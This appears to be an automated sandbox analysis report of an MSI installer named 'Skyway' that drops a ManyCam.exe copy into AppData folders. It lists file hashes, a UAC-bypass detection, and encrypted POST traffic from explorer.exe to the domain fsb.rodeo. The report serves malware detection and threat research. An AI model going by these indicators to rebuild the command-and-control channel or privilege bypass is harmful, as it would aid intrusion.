SHA-512:	7572476C74391154E6739B2623A6E6AF87B18E26028DF377C2064655065DD16A6FCD4C9C3B31185F504C0600A7BE385984A8C6CED9C4E39E706FF19BC9BEEDDF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DF8E2EB06A0B177A66.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFB435F57CF98BFBA2.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFC251CEA630B464A3.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	512
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	BF619EAC0CDF3F68D496EA9344137E8B
SHA1:	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
SHA-256:	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF476F7B3158FD1B4.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	1.4665837081119206
Encrypted:	false
SSDEEP:	48:Z8Ph2uRc06WXJ0jT5OWy9mS5okrw9mSIR5S:Uh213jTPxAW
MD5:	B2C9C22941383F40D5712A8F54C7D10C
SHA1:	45D1A2DE54DD99944C6A854BB0C0DD0D528BA7C8
SHA-256:	8011F922ED222178D3C9749567857CF91665067E566812C907FF2B4F21FE8933
SHA-512:	6B3489AB16BB75D76986B75F6102D85B9AA8E3B696472B983466F442B6551C5BE50D57387C3537B63FDFF890607038721FA6E05BC389587D518A2FEA20719D7E
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\Temp\~DFF5B1C3735C9220FA.TMP

Download File

Process:	C:\Windows\System32\msiexec.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	1.1822463460178916
Encrypted:	false
SSDEEP:	48:gheuJJveFXJPT5AWy9mS5okrw9mSIR5S:oed3TdxAW
MD5:	1E33E41F62133663D1B43B65C0807479
SHA1:	C027D2EB25CA69A056E7E8E9657FDFE7E7E9CEAB
SHA-256:	35E5C3484D6A2DA39380C3599AB0032402885FA85E423B9FA7798CFADB2B61AB
SHA-512:	7572476C74391154E6739B2623A6E6AF87B18E26028DF377C2064655065DD16A6FCD4C9C3B31185F504C0600A7BE385984A8C6CED9C4E39E706FF19BC9BEEDDF
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Skyway, Author: Nightline Curlicue, Keywords: Installer, Comments: This installer database contains the logic and data required to install Skyway., Template: Intel;1033, Revision Number: {C2411C2F-1F57-4746-A7B0-9045F077EB67}, Create Time/Date: Wed Oct 9 10:51:28 2024, Last Saved Time/Date: Wed Oct 9 10:51:28 2024, Number of Pages: 500, Number of Words: 10, Name of Creating Application: WiX Toolset (4.0.0.0), Security: 2
Entropy (8bit):	7.992768771716366
TrID:	Microsoft Windows Installer (60509/1) 88.31% Generic OLE2 / Multistream Compound File (8008/1) 11.69%
File name:	kvW4hZu9JA.msi
File size:	2'850'816 bytes
MD5:	2de2b3c8fa96e43890e49ecbfe0eccb0
SHA1:	ce46ea6169c109297d2b09ef9b240affe6623037
SHA256:	9cd2698d22ea6c144489b104d7d4680392f5ec333791fe164090b513b3073a7c
SHA512:	9e6d81600b4a6f0f9f2b9be58cf22074ddc81e0740a632c6775bbfa050e000e6e9b17077360ab1cbbb1238c90ecdd982b5594ef1af87f1a364aa21edf4d60473
SSDEEP:	49152:fiSoOl+YyNuCClJkqr6zeM4I/157fW8KvPRlep0IzM/d/c1Adfz3GcduofnQ:ft7+YJCCvkP4Id59KvbVqMlCq73Gcdm
TLSH:	3CD53364B6542EC7C36EF3300FA6E7A6C914CD481992A160F81679543FF2BB367E34A4
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	2d2e3797b32b2b99

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 18, 2024 12:09:04.144404888 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:04.144442081 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:04.144531965 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:04.145766020 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:04.145777941 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.101650953 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.101783037 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.106914997 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.106935978 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.107438087 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.154529095 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.158790112 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.158843040 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.158976078 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.456701994 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.498265028 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.498298883 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.498466015 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.498497963 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.498677969 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.498709917 CEST	443	49739	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.498755932 CEST	49739	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.518050909 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.518151045 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:05.518245935 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.518558979 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:05.518593073 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:06.471620083 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:06.471756935 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:06.473398924 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:06.473413944 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:06.473622084 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:06.474579096 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:06.474627018 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:06.474632978 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:07.549015045 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:07.549108982 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:07.549288988 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:07.549472094 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:07.549523115 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:07.549556017 CEST	49740	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:07.549572945 CEST	443	49740	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:07.569197893 CEST	49741	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:07.569252968 CEST	443	49741	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:07.569327116 CEST	49741	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:07.569593906 CEST	49741	443	192.168.2.4	193.233.48.182
Oct 18, 2024 12:09:07.569611073 CEST	443	49741	193.233.48.182	192.168.2.4
Oct 18, 2024 12:09:08.077740908 CEST	49741	443	192.168.2.4	193.233.48.182

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 18, 2024 12:09:04.105220079 CEST	54201	53	192.168.2.4	1.1.1.1
Oct 18, 2024 12:09:04.136215925 CEST	53	54201	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 18, 2024 12:09:04.105220079 CEST	192.168.2.4	1.1.1.1	0x6230	Standard query (0)	fsb.rodeo	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 18, 2024 12:09:04.136215925 CEST	1.1.1.1	192.168.2.4	0x6230	No error (0)	fsb.rodeo		193.233.48.182	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fsb.rodeo

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49739	193.233.48.182	443	5548	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-18 10:09:05 UTC	245	OUT	POST /api HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Content-Length: 128 Host: fsb.rodeo
2024-10-18 10:09:05 UTC	128	OUT	Data Raw: 52 33 37 66 66 56 77 57 4e 49 66 76 7a 57 50 32 6b 73 52 48 6e 51 78 74 73 77 6e 54 57 66 4a 6e 76 55 52 72 32 78 36 54 77 32 49 6d 69 69 62 65 68 55 2f 6c 6c 71 41 6a 52 47 55 31 61 56 2f 43 39 58 6a 74 34 75 45 53 51 57 7a 62 4c 37 39 4b 34 62 57 46 6c 4b 30 73 30 79 45 4e 67 5a 43 50 51 52 76 41 4a 50 42 71 58 69 6e 6c 34 37 32 37 4f 32 71 53 69 4c 65 4e 46 2f 77 36 4e 72 63 3d Data Ascii: R37ffVwWNIfvzWP2ksRHnQxtswnTWfJnvURr2x6Tw2ImiibehU/llqAjRGU1aV/C9Xjt4uESQWzbL79K4bWFlK0s0yENgZCPQRvAJPBqXinl4727O2qSiLeNF/w6Nrc=
2024-10-18 10:09:05 UTC	270	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 18 Oct 2024 10:09:05 GMT Content-Type: text/plain Content-Length: 108 Connection: close vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers access-control-allow-credentials: true
2024-10-18 10:09:05 UTC	108	IN	Data Raw: 47 44 54 54 4f 58 72 69 59 6a 73 66 68 42 6b 56 4d 64 49 65 32 4e 54 4b 4d 58 37 57 44 48 50 77 4e 49 53 4f 4f 4c 61 4b 33 4b 33 42 31 49 31 6a 78 70 75 2f 6b 6a 52 58 2f 36 34 6e 4f 68 70 31 2f 73 4d 67 58 4f 75 7a 77 6b 63 51 35 50 65 72 4b 6e 37 47 67 69 4d 32 50 6c 6c 50 54 67 67 64 46 48 63 34 66 6d 66 44 47 2b 2f 51 Data Ascii: GDTTOXriYjsfhBkVMdIe2NTKMX7WDHPwNISOOLaK3K3B1I1jxpu/kjRX/64nOhp1/sMgXOuzwkcQ5PerKn7GgiM2PllPTggdFHc4fmfDG+/Q

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49740	193.233.48.182	443	5548	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-18 10:09:06 UTC	245	OUT	POST /api HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Content-Length: 420 Host: fsb.rodeo
2024-10-18 10:09:06 UTC	420	OUT	Data Raw: 68 6c 41 59 7a 64 4e 34 6c 78 57 59 6a 41 4c 76 5a 51 71 78 6a 66 33 4a 6f 41 2f 31 45 64 78 55 51 42 45 34 6f 69 66 43 4e 44 67 58 30 32 31 51 64 46 50 4c 75 72 52 47 32 4d 62 71 38 34 39 6e 39 67 30 78 44 71 30 4e 57 38 63 5a 66 66 6d 71 52 70 4d 63 42 6c 62 74 63 64 75 72 70 71 31 54 73 46 69 33 30 41 33 56 7a 6e 4d 54 64 69 30 6f 33 39 67 6b 6c 4a 49 61 50 48 4c 77 6a 6f 4f 36 55 71 6c 45 51 2b 47 66 63 68 41 41 44 49 49 52 74 35 64 35 2f 63 4b 57 66 6c 4c 43 59 57 62 75 69 43 75 54 68 4c 72 52 54 2b 63 7a 31 75 4a 34 4f 6a 77 42 2f 69 38 55 37 73 65 51 50 37 50 52 41 38 42 68 2f 54 55 48 48 67 78 30 33 2b 58 59 77 5a 71 46 74 31 75 69 4c 39 55 4f 63 67 52 67 61 65 6e 30 57 41 61 38 49 2f 57 41 63 38 6d 67 47 32 63 6c 46 51 6b 6c 36 64 6b 62 4a 6e 48 Data Ascii: hlAYzdN4lxWYjALvZQqxjf3JoA/1EdxUQBE4oifCNDgX021QdFPLurRG2Mbq849n9g0xDq0NW8cZffmqRpMcBlbtcdurpq1TsFi30A3VznMTdi0o39gklJIaPHLwjoO6UqlEQ+GfchAADIIRt5d5/cKWflLCYWbuiCuThLrRT+cz1uJ4OjwB/i8U7seQP7PRA8Bh/TUHHgx03+XYwZqFt1uiL9UOcgRgaen0WAa8I/WAc8mgG2clFQkl6dkbJnH
2024-10-18 10:09:07 UTC	270	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 18 Oct 2024 10:09:06 GMT Content-Type: text/plain Content-Length: 164 Connection: close vary: Origin, Access-Control-Request-Method, Access-Control-Request-Headers access-control-allow-credentials: true
2024-10-18 10:09:07 UTC	164	IN	Data Raw: 70 39 67 45 69 62 70 42 52 6b 35 5a 6b 31 2b 4c 72 45 64 4d 6e 41 78 6e 66 37 2f 78 77 78 72 32 4e 72 37 50 51 6f 2b 70 36 32 36 70 46 7a 39 75 36 34 47 71 73 72 41 6f 6a 42 2b 6b 30 52 49 62 5a 37 51 5a 57 35 2f 38 52 2f 4f 4d 62 61 47 46 73 79 55 4c 62 6b 6b 42 74 54 4c 6a 6e 46 31 42 2b 62 64 54 54 6f 56 46 35 45 6b 75 59 68 72 4a 4e 5a 42 6b 54 38 53 30 43 77 34 47 65 36 52 70 6f 30 72 39 68 59 43 58 53 4c 58 42 78 66 49 4a 43 52 72 43 39 6a 53 6e 53 51 6d 71 38 56 56 63 6b 35 70 73 Data Ascii: p9gEibpBRk5Zk1+LrEdMnAxnf7/xwxr2Nr7PQo+p626pFz9u64GqsrAojB+k0RIbZ7QZW5/8R/OMbaGFsyULbkkBtTLjnF1B+bdTToVF5EkuYhrJNZBkT8S0Cw4Ge6Rpo0r9hYCXSLXBxfIJCRrC9jSnSQmq8VVck5ps

Target ID:	0
Start time:	06:08:30
Start date:	18/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\kvW4hZu9JA.msi"
Imagebase:	0x7ff703940000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	06:08:31
Start date:	18/10/2024
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff703940000
File size:	69'632 bytes
MD5 hash:	E5DA170027542E25EDE42FC54C929077
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	06:08:32
Start date:	18/10/2024
Path:	C:\Users\user\AppData\Local\Hazan\ManyCam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Hazan\ManyCam.exe"
Imagebase:	0x400000
File size:	1'756'232 bytes
MD5 hash:	BA699791249C311883BAA8CE3432703B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1728202341.00000000041AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:08:33
Start date:	18/10/2024
Path:	C:\Windows\System32\pcaui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Local\Hazan\ManyCam.exe"
Imagebase:	0x7ff70eb70000
File size:	162'816 bytes
MD5 hash:	0BA34D8D0BD01CB98F912114ACC7CF19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:08:34
Start date:	18/10/2024
Path:	C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe
Imagebase:	0x400000
File size:	1'756'232 bytes
MD5 hash:	BA699791249C311883BAA8CE3432703B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1781456308.0000000003DAE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:08:34
Start date:	18/10/2024
Path:	C:\Windows\System32\pcaui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Imagebase:	0x7ff70eb70000
File size:	162'816 bytes
MD5 hash:	0BA34D8D0BD01CB98F912114ACC7CF19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:08:34
Start date:	18/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000006.00000002.2016186641.0000000004D11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:08:34
Start date:	18/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:08:56
Start date:	18/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.2944068790.0000000002916000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	06:09:10
Start date:	18/10/2024
Path:	C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Imagebase:	0x400000
File size:	1'756'232 bytes
MD5 hash:	BA699791249C311883BAA8CE3432703B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2145200358.00000000041B2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:09:10
Start date:	18/10/2024
Path:	C:\Windows\System32\pcaui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Imagebase:	0x7ff70eb70000
File size:	162'816 bytes
MD5 hash:	0BA34D8D0BD01CB98F912114ACC7CF19
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:09:10
Start date:	18/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2200981328.0000000002B70000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000F.00000002.2201194681.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	06:09:10
Start date:	18/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	06:09:21
Start date:	18/10/2024
Path:	C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Imagebase:	0x400000
File size:	1'756'232 bytes
MD5 hash:	BA699791249C311883BAA8CE3432703B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2264806702.0000000003D99000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	06:09:21
Start date:	18/10/2024
Path:	C:\Windows\System32\pcaui.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\pcaui.exe" -g {11111111-1111-1111-1111-111111111111} -x {bce4b583-343f-44b8-8f95-9f76104077b9} -a "ManyCam" -v "ManyCam LLC" -s "To work properly, this app must be reinstalled after you upgrade Windows." -n 4 -f 0 -k 0 -e "C:\Users\user\AppData\Roaming\gjs_channel_x86\ManyCam.exe"
Imagebase:	0x7ff70eb70000
File size:	162'816 bytes
MD5 hash:	0BA34D8D0BD01CB98F912114ACC7CF19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	06:09:22
Start date:	18/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000016.00000002.2459356306.00000000058AF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	06:09:22
Start date:	18/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	06:09:43
Start date:	18/10/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\explorer.exe
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000018.00000002.2461639622.0000000002C9D000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	0.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	60%
Total number of Nodes:	15
Total number of Limit Nodes:	4

Executed Functions

Function 00C3D5E0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 127
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,00000000), ref: 00C3D5FF
RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\SYSTEM\CentralProcessor\0\,00000000,00000001,?), ref: 00C3D65B
RegQueryValueExA.KERNEL32(?,~MHz,00000000,00000000,?,?), ref: 00C3D67B
RegCloseKey.KERNEL32(?), ref: 00C3D69F
QueryPerformanceFrequency.KERNEL32(?,?,00000000), ref: 00C3D73F

Strings

HARDWARE\DESCRIPTION\SYSTEM\CentralProcessor\0\, xrefs: 00C3D636
~MHz, xrefs: 00C3D675

Memory Dump Source

